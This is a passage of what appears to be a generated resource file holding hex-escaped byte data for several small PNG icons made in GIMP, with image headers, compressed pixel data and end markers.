21\\x8a\\xa2\\x69\\x4a\\xe8\\x0e\\xe0\\x38\\x0e\\x0e\\x87\\x03\\x4f\\x9f\\\n\\x3e\\xc5\\xe2\\xe2\\x22\\x96\\x97\\x97\\xd1\\x72\\x62\\x03\\x55\\x4e\\xf1\\xa6\\\n\\x0e\\x38\\xd5\\x05\\x87\\xf1\\xd7\\x9b\\x37\\x98\\x98\\x98\\x40\\x5f\\x5f\\x1f\\\n\\xda\\xdb\\xdb\\x8d\\xc2\\xc7\\x71\\x1c\\x32\\x99\\x0c\\x04\\x41\\x30\\xe0\\x24\\\n\\x12\\x09\\xc4\\x62\\x31\\x6c\\x6f\\x6f\\x63\\x7e\\x7e\\x1e\\xe7\\xcf\\x9d\\xab\\\n\\xa8\\xf5\\x8b\\x02\\x00\\x00\\x92\\xa9\\x14\\x12\\xc9\\x24\\x64\\x59\\x86\\xdf\\\n\\xef\\x87\\x24\\x49\\xe0\\x38\\x0e\\x1e\\x8f\\x07\\x3b\\x3b\\x3b\\x38\\x38\\x38\\\n\\xc0\\xe6\\xe6\\x26\\x22\\x91\\x08\\xfe\\xde\\xdf\\xb7\\xbc\\x45\\x2e\\x87\\x78\\\n\\x4b\\x00\\xac\\x40\\xc8\\x06\\xa5\\xe1\\xb0\\xe0\\x55\\xd3\\x9a\\x5f\\xf0\\x32\\\n\\x98\\xef\\xef\\x70\\xab\\x45\\xfc\\x17\\xd7\\xae\\x79\\x8b\\xd6\\x07\\x94\\xe3\\\n\\xf6\\x46\\xb1\\x63\\x6c\\x6c\\xec\\x55\\x41\\xad\\x70\\x31\\xd3\\xa1\\x5a\\xad\\\n\\x5f\\x30\\x80\\x6a\\x87\\xf0\\xf9\\xe8\\xe8\\xe5\\xeb\\xd7\\xaf\\xff\\xf6\\x41\\\n\\x9b\\x21\\xbb\\x42\\xb8\\x1d\\x0c\\x52\\x9f\\xcf\\x67\\x69\\x5c\\xf1\\x78\\x9c\\\n\\x88\\xa2\\xc8\\x6a\\xe6\\xc2\\xc4\\xb7\\xf7\\xee\\x51\\x97\\xcb\\x05\\x41\\x10\\\n\\x98\\x99\\x70\\xbd\\xfe\\x89\\xa2\\xa8\\x96\\xec\\xca\\xcc\\xd1\\xce\\xb0\\x94\\\n\\x9b\\x9e\\xc0\\xf8\\x38\\xed\\xe9\\xe9\\x31\\x3e\\x9b\\xfd\\xee\\x39\\x1e\\x8f\\\n\\x53\\x00\\x0c\\x00\\x11\\x45\\x51\\x2b\\xea\\xc8\\x8e\\x82\\xd0\\x8f\\xd1\\xf4\\\n\\xa3\\xb2\\x4a\\x16\\xba\\x2c\\xb3\\x6f\\xc0\\x2a\\xc9\\xd4\\x94\\x3a\\x35\\xaa\\\n\\xf2\\xda\\x5c\\xa9\\x61\\xd8\\xe6\\xe2\\x64\\xb1\\x60\\xd8\\xb1\\xf1\\xfa\\x18\\\n\\x76\\x8c\\x7f\\x00\\xdf\\xa0\\x6a\\x3d\\xf5\\x68\\xb7\\xbc\\x00\\x00\\x00\\x00\\\n\\x49\\x45\\x4e\\x44\\xae\\x42\\x60\\x82\\\n\\x00\\x00\\x06\\xa9\\\n\\x89\\\n\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0d\\x49\\x48\\x44\\x52\\x00\\\n\\x00\\x00\\x40\\x00\\x00\\x00\\x40\\x08\\x06\\x00\\x00\\x00\\xaa\\x69\\x71\\xde\\\n\\x00\\x00\\x00\\x06\\x62\\x4b\\x47\\x44\\x00\\xff\\x00\\xff\\x00\\xff\\xa0\\xbd\\\n\\xa7\\x93\\x00\\x00\\x00\\x09\\x70\\x48\\x59\\x73\\x00\\x00\\x0b\\x13\\x00\\x00\\\n\\x0b\\x13\\x01\\x00\\x9a\\x9c\\x18\\x00\\x00\\x00\\x07\\x74\\x49\\x4d\\x45\\x07\\\n\\xe5\\x03\\x1d\\x12\\x1e\\x04\\xa3\\x00\\x59\\xdb\\x00\\x00\\x00\\x1d\\x69\\x54\\\n\\x58\\x74\\x43\\x6f\\x6d\\x6d\\x65\\x6e\\x74\\x00\\x00\\x00\\x00\\x00\\x43\\x72\\\n\\x65\\x61\\x74\\x65\\x64\\x20\\x77\\x69\\x74\\x68\\x20\\x47\\x49\\x4d\\x50\\x64\\\n\\x2e\\x65\\x07\\x00\\x00\\x06\\x0d\\x49\\x44\\x41\\x54\\x78\\xda\\xed\\x5b\\x4d\\\n\\x6c\\x13\\x47\\x14\\xfe\\x76\\x76\\xd7\\x0e\\x7b\\x88\\x9d\\x78\\x83\\x65\\xd6\\\n\\x09\\x02\\x15\\x05\\x48\\x82\\x10\\x24\\x97\\xe2\\x00\\x0a\\x6a\\x73\\xe1\\x50\\\n\\x62\\x25\\x41\\x69\\x72\\x40\\x15\\x1c\\x22\\x01\\x52\\x1b\\x89\\x16\\x2e\\xbd\\\n\\x55\\x41\\x95\\x10\\xea\\x85\\x23\\x42\\x3d\\x21\\x44\\x85\\x2a\\xa1\\xa8\\xa2\\\n\\x0d\\xd0\\x43\\x28\\x02\\xc1\\x01\\x42\\x88\\x22\\xa2\\x92\\x3a\\x10\\x14\\x48\\\n\\x4a\\xc2\\xae\\xd7\\xfb\\x33\\x3d\\x34\\xb6\\x9c\\x60\\x7b\\xd7\\xc1\\x8e\\xbd\\\n\\x36\\xef\\x66\\x7b\\x66\\xbc\\xdf\\xf7\\xbe\\xf7\\xe6\\xcd\\xec\\x0c\\xf0\\xd1\\\n\\xca\\xdb\\x98\\xb5\\xfc\\xb3\\xef\\x4e\\x9d\\xa2\\xd9\\xb4\\xff\\x61\\x70\\x90\\\n\\x71\\x34\\x01\\xd9\\x02\\x2e\\x04\\x19\\x4c\\x31\\x83\\x5e\\x0b\\x32\\x72\\x36\\\n\\xd0\\xf0\\xf0\\xb0\\xef\\xb7\\xa1\\xa1\\xd9\\xb5\\x0c\\xa9\\x5c\\x10\\xc1\\x38\\\n\\xc5\\xeb\\xf9\\x22\\x82\\x71\\x32\\xf0\\x5c\\x90\\xc0\\x94\\x02\\xf8\\xb8\\x6d\\\n\\x90\\xa4\\x6f\\x8f\\x9f\\x38\\x31\\x98\\x77\\x02\\x8a\\x11\\xfc\\x6a\\xd5\\x90\\\n\\xb1\\xa1\\x2c\\xcb\\x0c\\x00\\x08\\x82\\x40\\x9d\\x02\\x3e\\x5b\\x12\\x98\\x54\\\n\\x80\\x57\\x82\\x76\\x1a\\xf8\\x6c\\x48\\x60\\xec\\x00\\x77\\x22\\x78\\xbb\\x24\\\n\\x70\\x99\\x40\\x3b\\x1d\\x7c\\x4e\\x92\\x60\\x29\\x80\\xcf\\xa4\\x02\\x52\\x0e\\\n\\x2b\\xbe\\x4c\\x4e\\x24\\xe5\\x2a\\x7d\\xcb\\x10\\x28\\x45\\xf0\\xa9\\x42\\xa1\\\n\\x2c\\x42\\x20\\x93\\x53\\x49\\xb9\\x4a\\xbf\\x2c\\x15\\x90\\xca\\xb9\\x65\\x47\\\n\\x80\\xa5\\x02\\xca\\x49\\xfe\\x1f\\xac\\x80\\xb9\\xf9\\x79\\x74\\x1d\\x3e\\x8c\\\n\\x27\\x4f\\x9f\\x3a\\x36\\x0c\\x56\\x45\\x40\\x64\\x7a\\x1a\\xbe\\x9a\\x1a\\x7c\\\n\\x33\\x30\\x80\\x6d\\xdb\\xb6\\x41\\x92\\x24\\xdb\\x7d\\x45\\x51\\x2c\\x2a\\x32\\\n\\xb8\\xd5\\xc8\\xff\\xcb\\xde\\x5e\\xec\\xde\\xbd\\x1b\\x55\\x55\\x55\\x50\\x55\\\n\\x15\\xd3\\x91\\x08\\x2a\\xeb\\xeb\\x2d\\xfb\\xb5\\x1d\\x38\\x80\\x4f\\xf7\\xec\\\n\\xc1\\x9f\\xb7\\x6f\\xe3\\xd6\\xcd\\x9b\\xc5\\x47\\x80\\x1d\\xdb\\x52\\x5f\\x8f\\\n\\x50\\x28\\x04\\x96\\x65\\x41\\x29\\x45\\x2c\\x16\\xc3\\x7a\\xbf\\x3f\\x63\\x9f\\\n\\x4d\\x9b\\x36\\xe1\\x8b\\x8e\\x0e\\x50\\x4a\\x41\\x29\\x75\\x6e\\x0e\\xa8\\xf2\\\n\\xf9\\x10\\x0e\\x87\\xc1\\xb2\\x2c\\x4c\\xd3\\x84\\xa6\\x69\\x10\\x04\\x01\\x2e\\\n\\x97\\x2b\\xf5\\xe0\\x84\\xa0\\x23\\x1c\\x46\\x67\\x77\\x37\\x7e\\xbd\\x76\\x0d\\\n\\x43\\xd7\\xaf\\x83\\x52\\x8a\\xc5\\xc5\\xc5\\xa2\\xc9\\x03\\xb6\\x09\\x50\\x54\\\n\\x15\\xe1\\x70\\x18\\x82\\x20\\x2c\\xf3\\x22\\xcb\\xb2\\xd8\\xb5\\x6b\\x57\\xca\\\n\\x3e\\x5f\\x1d\\x3d\\x0a\\x96\\x65\\xf1\\xe3\\xd9\\xb3\\x98\\x98\\x98\\x80\\xc7\\\n\\xeb\\x05\\xc3\\x30\\x98\\x7a\\xfe\\xbc\\x38\\x73\\x40\\x26\\x3b\\x72\\xe4\\x08\\\n\\xfc\\x7e\\x3f\\x74\\x5d\\x4f\\x10\\x40\\x29\\x05\\x21\\x04\\x75\\x75\\x75\\x18\\\n\\x1f\\x1b\\x7b\\xaf\\xcf\\xa5\\x8b\\x17\\xa1\\xaa\\x6a\\xe2\\xb3\\x14\\x0c\\x42\\\n\\x51\\x14\\x44\\xa3\\x51\\x67\\x85\\x80\\x6e\\x9a\\x08\\x04\\x02\\xa8\\xa8\\xa8\\\n\\x58\\xe6\\x7d\\x4a\\x29\\x34\\x4d\\x83\\x3f\\x4d\\x0e\\x48\\x06\\x5f\\x51\\x51\\\n\\x81\\xea\\xea\\x6a\\xc8\\xb2\\x0c\\x5d\\xd7\\x13\\xdf\\x37\\xed\\xd8\\x51\\xfc\\\n\\x0a\\xe8\\xe8\\xe8\\x80\\xd7\\xeb\\x85\\x69\\x9a\\xcb\\x97\\x92\\x0c\\x03\\x4a\\\n\\x29\\x44\\x51\\xc4\\xc4\\xb3\\x67\\xf8\\x64\\xf3\\xe6\\x8c\\xe3\\x08\\x82\\x80\\\n\\x99\\x97\\x2f\\x21\\xcb\\x32\\x44\\x51\\x44\\x67\\x77\\x37\\x38\\x8e\\xc3\\xd3\\\n\\xb1\\x31\\xc4\\x62\\xb1\\xe2\\x24\\xe0\\xd9\\xe4\\x24\\x1a\\x1a\\x1a\\xfe\\x57\\\n\\x42\\x92\\xe7\\xe2\\x66\\x18\\x06\\x3c\\x1e\\x0f\\x9a\\x9b\\x9b\\x31\\xff\\xe6\\\n\\x4d\\xda\\x71\\xd6\\xad\\x5b\\x07\\x41\\x10\\x10\\x89\\x44\\xf0\\x79\\x7b\\x3b\\\n\\x9a\\x5b\\x5a\\xf0\\xfb\\x8d\\x1b\\xb8\\x33\\x32\\x02\\x86\\x61\\x0a\\x1b\\x02\\\n\\x8a\\xa2\\xa4\\x7d\\x02\\xb1\\xa6\\x06\\xd1\\x68\\x34\\xe3\\xf4\\xe5\\x76\\xbb\\\n\\xd1\\xdf\\xdf\\x0f\\xc3\\x30\\xd2\\xb6\\x09\\xd6\\xd6\\x82\\x65\\x59\\xec\\xdb\\\n\\xbf\\x1f\\xeb\\xfd\\x7e\\x9c\\x3f\\x77\\x0e\\x7f\\xdd\\xb9\\x93\\x50\\x91\\x69\\\n\\x9a\\x05\\x99\\x22\\x13\\x39\\x20\\x12\\x89\\x30\\xe9\\xe6\\xf0\\x9a\\x9a\\x9a\\\n\\x94\\xde\\x8f\\x5b\\x2c\\x16\\x03\\x21\\x04\\x95\\x5e\\x6f\\xda\\x36\\x63\\x4f\\\n\\x9e\\x60\\x61\\x61\\x01\\xbf\\x5c\\xbd\\x8a\\x9f\\x2f\\x5d\\xc2\\xbb\\x77\\xef\\\n\\x96\\x85\\x52\\xa1\\x54\\x40\\x96\\xe4\\x49\\x25\\x49\\x4a\\x49\\xbf\\xdf\\xef\\\n\\x87\\x69\\x9a\\x20\\x24\\x7d\\xbe\\x34\\x0c\\x03\\x2e\\x97\\x0b\\xa1\\x50\\x28\\\n\\x6d\\x1b\\x4d\\xd3\\xf0\\xd3\\xf9\\xf3\\x18\\x7d\\xfc\\x38\\xf5\\xd6\\xd4\\x12\\\n\\x01\\x86\\x61\\xbc\\x97\\x6b\\x0a\\x3a\\x0b\\x34\\x34\\x34\\x58\\x3e\\x10\\xc3\\\n\\x30\\x30\\x0c\\x03\\x4d\\x4d\\x4d\\x98\\x7f\\xfb\\x36\\x6d\\x3b\\x2b\\x89\\x33\\\n\\x0c\\x03\\x96\\x65\\x6d\\xb5\\x5d\\x33\\x02\\x1e\\x3e\\x7c\\x08\\x8e\\xe3\\x6c\\\n\\x79\\xa5\\xba\\xba\\x1a\\x67\\xce\\x9c\\xc1\\xdf\\x53\\x53\\x19\\xdb\\x59\\x95\\\n\\xc4\\xf1\\xbc\\x10\\x0f\\xbb\\x7c\\x90\\x11\\xdf\\x1f\\xb4\\x24\\x20\\x16\\x8b\\\n\\x41\\xd7\\xf5\\x84\\x67\\xd2\\x99\\x69\\x9a\\x50\\x14\\x05\\x1e\\x8f\\x07\\x7d\\\n\\x7d\\x7d\\x88\\x4c\\x4f\\x5b\\x7a\\x3b\\xd3\\x6f\\x84\\x90\\x44\\xd8\\xe5\\x33\\\n\\x3f\\x90\\x54\\xac\\x24\\xdb\\xf8\\xf8\\x78\\x22\\x4b\\xdb\\x31\\x9e\\xe7\\xd1\\\n\\xd2\\xd2\\x82\\xd6\\xbd\\x7b\\x57\\x05\\x7e\\xe5\\x5a\\xa2\\xe0\\x21\\x30\\x33\\\n\\x33\\x83\\xd9\\xd9\\x59\\x70\\x9c\\xbd\\xaa\\x99\\x52\\x0a\\x9f\\xcf\\x87\\x9e\\\n\\x9e\\x1e\\x6c\\x08\\x06\\x8b\\x72\\x43\\x24\\xd9\\xd1\\x96\\x04\\xd4\\x05\\x83\\\n\\x98\\x9b\\x9b\\x03\\xcf\\xf3\\xb6\\x3c\\x47\\x29\\x85\\x2c\\xcb\\xe0\\x79\\x1e\\\n\\xc7\\x8e\\x1d\\xc3\\x8e\\x9d\\x3b\\x9d\\xb5\\x25\\x96\\x2a\\x0c\\x06\\x07\\x07\\\n\\xf1\\xe2\\xc5\\x0b\\xcb\\x3c\\x90\\x2c\\x71\\x5d\\xd7\\xc1\\x71\\x1c\\x0e\\x1d\\\n\\x3a\\x84\\xc6\\x02\\xd7\\xfb\\x1f\\xbc\\x18\\x92\\x02\\x01\\x8c\\x8c\\x8c\\x64\\\n\\x1d\\x97\\xaa\\xaa\\x82\\x10\\x82\\x9e\\x9e\\x1e\\x1c\\x3f\\x79\\x12\\xda\\x8a\\\n\\x4a\\xb1\\x18\\x36\\x47\\x6c\\xa3\\xb9\\x72\\xe5\\x0a\\x16\\x16\\x16\\xe0\\x76\\\n\\xbb\\x13\\xd3\\x94\\xad\\x95\\xa4\\xae\\x43\\x51\\x14\\x88\\xa2\\x88\\xfe\\xfe\\\n\\x7e\\x48\\xb5\\xb5\\x89\\x69\\xb2\\x10\\xd5\\xdf\\x4a\\x85\\x67\\xf5\\x6e\\x70\\\n\\x2a\\x12\\xc1\\xe9\\xd3\\xa7\\x51\\xbf\\xb4\\xff\\x97\\xbc\\xdc\\xb5\\x93\\xd1\\\n\\xdd\\x6e\\x37\\x00\\xe0\\xd1\\xa3\\x47\\xb8\\x77\\xef\\x1e\\xee\\xde\\xbd\\x0b\\\n\\x6f\\x65\\x65\\x71\\x12\\x90\\x8e\\x04\\x10\\x82\\xbe\\xbe\\x3e\\x6c\\xdd\\xba\\\n\\x15\\x9a\\xa6\\x41\\xd3\\x34\\xdb\\x61\\x41\\x29\\x05\\xcf\\xf3\\xe0\\x38\\x0e\\\n\\xaf\\x5f\\xbf\\xc6\\xfd\\xfb\\xf7\\x71\\x6b\\x78\\xb8\\x60\\xe0\\x01\\x20\\x63\\\n\\x56\\x6b\\x0d\\x85\\xbe\\x4f\\x81\\x02\\x7f\\x0c\\x0f\\x83\\xe7\\x79\\x6c\\xdc\\\n\\xb8\\x11\\x82\\x20\\xd8\\x0a\\x09\\x42\\x08\\x58\\x96\\x85\\xcb\\xe5\\xc2\\xe8\\\n\\xe8\\x28\\x2e\\x5f\\xbe\\x8c\\xa1\\xa1\\x21\\x54\\x65\\x58\\x40\\xe5\\x1b\\xbc\\\n\\xa5\\x02\\xd2\\xaa\\x60\\xc9\\x5e\\xbe\\x7a\\x85\\xae\\xae\\x2e\\x34\\x36\\x36\\\n\\x22\\xb8\\x34\\xe7\\x6b\\x9a\\x06\\x96\\x65\\xa1\\xeb\\x7a\\x62\\xea\\xa4\\x94\\\n\\x42\\x51\\x14\\xcc\\xce\\xce\\x62\\x62\\x62\\x02\\x17\\x2e\\x5c\\xb0\\xdc\\x3c\\\n\\x71\\x04\\x01\\x00\\x10\\x55\\x55\\x28\\xd1\\x28\\x24\\x49\\x42\\x28\\x14\\x82\\\n\\x28\\x8a\\x60\\x59\\x16\\x81\\x40\\x00\\x93\\x93\\x93\\x58\\x5c\\x5c\\xc4\\x83\\\n\\x07\\x0f\\x30\\x35\\x35\\x85\\x7f\\xe7\\xe6\\x0a\\xf2\\x62\\x24\\xd3\\x11\\x19\\\n\\x5b\\x69\\x38\\xdb\\xf7\\x85\\x51\\x55\\x45\\xc5\\x52\\xc2\\x2b\\xa6\\xaa\\x6f\\\n\\xd5\\xd3\\x60\\xb6\\xe7\\x70\\x8b\\x05\\xfc\\x67\\xed\\xed\\xb5\\x39\\xab\\x03\\\n\\xd6\\xe2\\xf6\\x46\\xae\\xad\\xad\\xad\\xed\\x1f\\xcb\\xaa\\x35\\xdb\\x41\\x4b\\\n\\xfa\\xa8\\x6c\\x29\\x90\\xb0\\xa7\\xb5\\x75\\xdf\\xc1\\x83\\x07\\x6f\\xdb\\x6d\\\n\\x5f\\x52\\xc7\\xe5\\x7b\\x7a\\x7b\\x49\\x53\\x53\\x93\\xad\\xe7\\x92\\x65\\x99\\\n\\x11\\x04\\x81\\x96\\xcc\\x85\\x89\\xaf\\x07\\x06\\x88\\xd7\\xeb\\x05\\xcf\\xf3\\\n\\xd4\\x0a\\x78\\x3c\\xff\\x09\\x82\\x60\\xe4\\xed\\xca\\x4c\\x72\\x65\\x98\\xcf\\\n\\x45\\x4f\\xb8\\xb3\\x93\\x6c\\xdf\\xbe\\x3d\\xf1\\xd9\\xea\\xdc\\xb3\\x2c\\xcb\\\n\\x04\\x00\\x05\\xc0\\x08\\x82\\x60\\xe6\\xf4\\xc9\\x92\\x89\\x88\\x6f\\xa3\\xc5\\\n\\xf7\\xf7\\x0a\\x99\\xe8\\x52\\x78\\x3f\\x41\\x56\\x5e\\x5c\\x93\\xef\\xd0\\x28\\\n\\xca\\x6b\\x73\\xf9\\x26\\xc3\\x31\\x17\\x27\\x73\\x45\\x86\\x13\\x0b\\xaf\\x8f\\\n\\xe6\\x44\\xfb\\x0f\\xda\\xc3\\x92\\x66\\xc7\\x09\\x70\\x9f\\x00\\x00\\x00\\x00\\\n\\x49\\x45\\x4e\\x44\\xae\\x42\\x60\\x82\\\n\\x00\\x00\\x06\\x9e\\\n\\x89\\\n\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0d\\x49\\x48\\x44\\x52\\x00\\\n\\x00\\x00\\x40\\x00\\x00\\x00\\x40\\x08\\x06\\x00\\x00\\x00\\xaa\\x69\\x71\\xde\\\n\\x00\\x00\\x00\\x06\\x62\\x4b\\x47\\x44\\x00\\xff\\x00\\xff\\x00\\xff\\xa0\\xbd\\\n\\xa7\\x93\\x00\\x00\\x00\\x09\\x70\\x48\\x59\\x73\\x00\\x00\\x0b\\x13\\x00\\x00\\\n\\x0b\\x13\\x01\\x00\\x9a\\x9c\\x18\\x00\\x00\\x00\\x07\\x74\\x49\\x4d\\x45\\x07\\\n\\xe5\\x03\\x1d\\x12\\x1d\\x32\\x47\\x97\\x9f\\x81\\x00\\x00\\x00\\x1d\\x69\\x54\\\n\\x58\\x74\\x43\\x6f\\x6d\\x6d\\x65\\x6e\\x74\\x00\\x00\\x00\\x00\\x00\\x43\\x72\\\n\\x65\\x61\\x74\\x65\\x64\\x20\\x77\\x69\\x74\\x68\\x20\\x47\\x49\\x4d\\x50\\x64\\\n\\x2e\\x65\\x07\\x00\\x00\\x06\\x02\\x49\\x44\\x41\\x54\\x78\\xda\\xed\\x5b\\x4b\\\n\\x6c\\x13\\x47\\x18\\xfe\\x76\\xd6\\x6b\\x3b\\x7b\\x88\\x9d\\x64\\x83\\x65\\x6c\\\n\\x07\\x81\\x5a\\x05\\x91\\x38\\x20\\x48\\x4e\\x75\\x20\\x04\\xb5\\xb9\\x70\\x28\\\n\\xb1\\x08\\xc8\\x4d\\x0e\\xb4\\x80\\x5a\\x23\\x40\\xaa\\x90\\x68\\xe1\\xd2\\x5b\\\n\\x15\\x54\\x09\\xa1\\x5e\\x38\\x22\\xd4\\x0b\\x29\\xa2\\x42\\x95\\x50\\x54\\xd1\\\n\\x46\\xed\\x25\\x14\\x81\\xe0\\x10\\x42\\x41\\x16\\x51\\x49\\x1d\\x0a\\x32\\x84\\\n\\x2a\\x61\\xd7\\xeb\\x7d\\x4c\\x0f\\xb5\\x97\\x84\\xf8\\xb1\\x4e\\xed\\xd8\\x1b\\\n\\xf3\\xdf\\xbc\\x8f\\xf1\\x7c\\xdf\\x7c\\xff\\x63\\x66\\x67\\x80\\xb7\\x56\\xdb\\\n\\xc6\\xac\\xe4\\x9f\\x7d\\x79\\xf2\\x24\\x2d\\xe6\\xf9\\xaf\\x87\\x87\\x19\\x4b\\\n\\x13\\x50\\x2c\\xe0\\x4a\\x90\\xc1\\x54\\x33\\xe8\\x95\\x20\\xa3\\x64\\x0d\\x8d\\\n\\x8d\\x8d\\x35\\xfd\\x34\\x3a\\x9a\\x58\\x49\\x97\\x2a\\x05\\x11\\x8c\\x55\\x46\\\n\\xbd\\x5c\\x44\\x30\\x56\\x06\\x5e\\x0a\\x12\\x98\\xd5\\x00\\x3e\\x63\\x6b\\x7d\\\n\\xbe\\x2f\\x8e\\x1e\\x3b\\x36\\x5c\\x76\\x02\\xaa\\x11\\xfc\\x72\\xd5\\x90\\xf7\\\n\\x41\\x51\\x14\\x19\\x00\\xe0\\x79\\x9e\\x5a\\x05\\x7c\\xb1\\x24\\x30\\xd9\\x00\\\n\\xbf\\x09\\xda\\x6a\\xe0\\x8b\\x21\\x81\\x31\\x03\\xdc\\x8a\\xe0\\xcd\\x92\\x60\\\n\\xcb\\x07\\xda\\xea\\xe0\\x4b\\x12\\x04\\x57\\x03\\xf8\\x7c\\x2a\\x20\\xb5\\x30\\\n\\xe3\\xcb\\x37\\x88\\xa4\\x56\\xa5\\x5f\\xd0\\x05\\x56\\x23\\xf8\\x6c\\xae\\x50\\\n\\x13\\x2e\\x90\\x6f\\x50\\x49\\xad\\x4a\\xbf\\x26\\x15\\x90\\x6d\\x70\\x6b\\x8e\\\n\\x80\\x82\\x0a\\xa8\\x25\\xf9\\xff\\x6f\\x05\\xcc\\xbe\\x7c\\x89\\x81\\xfd\\xfb\\\n\\x71\\xff\\xc1\\x03\\xcb\\xba\\x81\\x6d\\x39\\x0d\\xc4\\x67\\x66\\xd0\\xb1\\x79\\\n\\x33\\x3e\\x3e\\x78\\x10\\x81\\x40\\x00\\x3e\\x9f\\xcf\\xb2\\x0a\\xb0\\x2d\\x47\\\n\\xfe\\x1f\\x0d\\x0e\\x62\\xdb\\xb6\\x6d\\x68\\x68\\x68\\x80\\x2c\\xcb\\x98\\x89\\\n\\xc7\\x51\\xdf\\xda\\x6a\\x7d\\x02\\xcc\\xd8\\xbb\\xad\\xad\\x08\\x85\\x42\\x60\\\n\\x59\\x16\\x94\\x52\\xa4\\x52\\x29\\xac\\xf1\\x78\\x6a\\x23\\x06\\x34\\x34\\x35\\\n\\x21\\x1c\\x0e\\x83\\x65\\x59\\xe8\\xba\\x0e\\x45\\x51\\xc0\\xf3\\x3c\\xec\\x76\\\n\\xbb\\x65\\xd3\\xa1\\x69\\x02\\x24\\x59\\x46\\x38\\x1c\\x06\\xcf\\xf3\\xa0\\xf4\\\n\\xb5\\xa7\\xb0\\x2c\\x8b\\xad\\x5b\\xb7\\x16\\x7c\\x5f\\x10\\x04\\x6b\\x2b\\xe0\\\n\\xc0\\x81\\x03\\xf0\\x78\\x3c\\x50\\x55\\xd5\\x20\\x80\\x52\\x0a\\x42\\x08\\x5a\\\n\\x5a\\x5a\\xf2\\xbe\\xdb\\xbb\\x6b\\x17\\x3e\\x8d\\x46\\xb1\\xa3\\xa7\\xc7\\x9a\\\n\\x31\\x40\\xd5\\x75\\x78\\xbd\\x5e\\x38\\x9d\\x4e\\xa4\\x52\\x29\\xe3\\x3a\\xa5\\\n\\x14\\x8a\\xa2\\xc0\\x93\\x23\\x06\\xac\\x5f\\xbf\\x1e\\x1f\\xf6\\xf7\\x83\\x52\\\n\\xba\\x48\\x35\\x96\\x53\\x40\\x7f\\x7f\\x3f\\xdc\\x6e\\x37\\x74\\x5d\\x5f\\x3c\\\n\\x95\\x64\\x18\\x50\\x4a\\x21\\x08\\x02\\x62\\x8f\\x1e\\xbd\\x6e\\x94\\x10\\xf4\\\n\\x87\\xc3\\xd8\\xbb\\x6f\\x1f\\x7e\\xbc\\x7a\\x15\\xa3\\xd7\\xae\\x81\\x52\\x8a\\\n\\xf9\\xf9\\x79\\xeb\\x11\\xf0\\x68\\x6a\\x0a\\x6d\\x6d\\x6d\\xff\\x29\\x41\\x55\\\n\\x97\\xdc\\xd7\\x34\\x0d\\x2e\\x97\\x0b\\x9d\\x9d\\x9d\\xc6\\xb5\\x4f\\x0e\\x1d\\\n\\x02\\xcb\\xb2\\xf8\\xe6\\xcc\\x19\\xc4\\x62\\x31\\xb8\\xdc\\x6e\\x30\\x0c\\x83\\\n\\xe9\\xc7\\x8f\\x97\\xbc\\x5f\\x69\\x65\\x10\\x00\\x90\\x24\\x29\\xe7\\xba\\x80\\\n\\xd0\\xdc\\x8c\\x64\\x32\\x99\\xb7\\xa3\\x0e\\x87\\x03\\xd1\\x68\\x14\\x9a\\xa6\\\n\\x01\\x00\\x2e\\x5e\\xb8\\x80\\xef\\x47\\x46\\x0c\\xc5\\xf8\\xfc\\x7e\\x48\\x92\\\n\\x84\\x64\\x32\\xb9\\x74\\x41\\x22\\xad\\x22\\x5d\\xd7\\x2b\\x42\\x86\\xa1\\x80\\\n\\x78\\x3c\\xce\\xe4\\xf2\\xe3\\xe6\\xe6\\xe6\\xac\\xa3\\x9f\\xb1\\x54\\x2a\\x05\\\n\\x42\\x08\\xea\\xdd\\x6e\\x00\\x80\\x2c\\xcb\\xc6\\x3d\\xa7\\xd3\\x89\\xc6\\xc6\\\n\\x46\\x88\\xa2\\xb8\\xa8\\x8d\\x60\\x47\\xc7\\x22\\x12\\x18\\x86\\xa9\\x9c\\x02\\\n\\xea\\xea\\xea\\xa8\\xcf\\xe7\\xcb\\x4a\\xbf\\xc7\\xe3\\x81\\xae\\xeb\\x20\\x24\\\n\\xb7\\xb7\\x68\\x9a\\x06\\xbb\\xdd\\x8e\\x50\\x28\\x94\\xf5\\x3e\\xcf\\xf3\\x98\\\n\\x7d\\xf1\\x02\\xa2\\x28\\x42\\x10\\x04\\x7c\\x76\\xe4\\x08\\x7a\\x76\\xee\\x5c\\\n\\x54\\x3f\\x64\\x08\\xd0\\x34\\x6d\\x49\\xac\\xa9\\x68\\x16\\x68\\x6b\\x6b\\x2b\\\n\\xd8\\x21\\x86\\x61\\xa0\\x69\\x1a\\x82\\xc1\\x20\\x2e\\x5d\\xba\\x04\\x77\\x7d\\\n\\xbd\\x71\\xaf\\xae\\xae\\x0e\\x3c\\xcf\\x23\\x1e\\x8f\\xe3\\x83\\xbe\\x3e\\x74\\\n\\x76\\x75\\xe1\\xe7\\xeb\\xd7\\xf1\\xfb\\x8d\\x1b\\x59\\xdb\\xc9\\x14\\x59\\x94\\\n\\xd2\\x15\\x51\\x45\\xc1\\x20\\x78\\xf7\\xee\\x5d\\xd8\\x6c\\x36\\x53\\xa3\\xd2\\\n\\xd8\\xd8\\x88\\xd3\\xa7\\x4f\\xe3\\xcf\\xe9\\x69\\xe3\\x9a\\x3f\\x10\\x00\\xcb\\\n\\xb2\\xd8\\xd1\\xd3\\x83\\x35\\x1e\\x0f\\xce\\x9d\\x3d\\x8b\\x1b\\xe3\\xe3\\x79\\\n\\xfd\\x3d\\x13\\x17\\x32\\x2e\\x53\\x8e\\xd8\\x90\\x59\\x1f\\x2c\\x48\\x40\\x2a\\\n\\x95\\x82\\xaa\\xaa\\x60\\x59\\x36\\xef\\x73\\xba\\xae\\x43\\x92\\x24\\xb8\\x5c\\\n\\x2e\\x0c\\x0d\\x0d\\x21\\x3e\\x33\\x03\\x00\\xf8\\xe3\\xfe\\x7d\\xcc\\xcd\\xcd\\\n\\xe1\\x87\\x2b\\x57\\xf0\\xdd\\xc5\\x8b\\x78\\xf5\\xea\\xd5\\x22\\xc9\\xe7\\x22\\\n\\x80\\x10\\x62\\xb8\\x5d\\x39\\x95\\x40\\xb2\\xb1\\xb2\\xd0\\x1e\\x3e\\x7c\\x68\\\n\\x44\\x69\\x33\\xc6\\x71\\x1c\\xba\\xba\\xba\\xd0\\xbd\\x7d\\x3b\\x00\\x40\\x51\\\n\\x14\\x7c\\x7b\\xee\\x1c\\x26\\xef\\xdd\\x5b\\xe2\\xef\\x05\\x3b\\x47\\x48\\xe5\\\n\\x5d\\xe0\\xe9\\xd3\\xa7\\x48\\x24\\x12\\xb0\\xd9\\xcc\\x4d\\x1c\\x29\\xa5\\x68\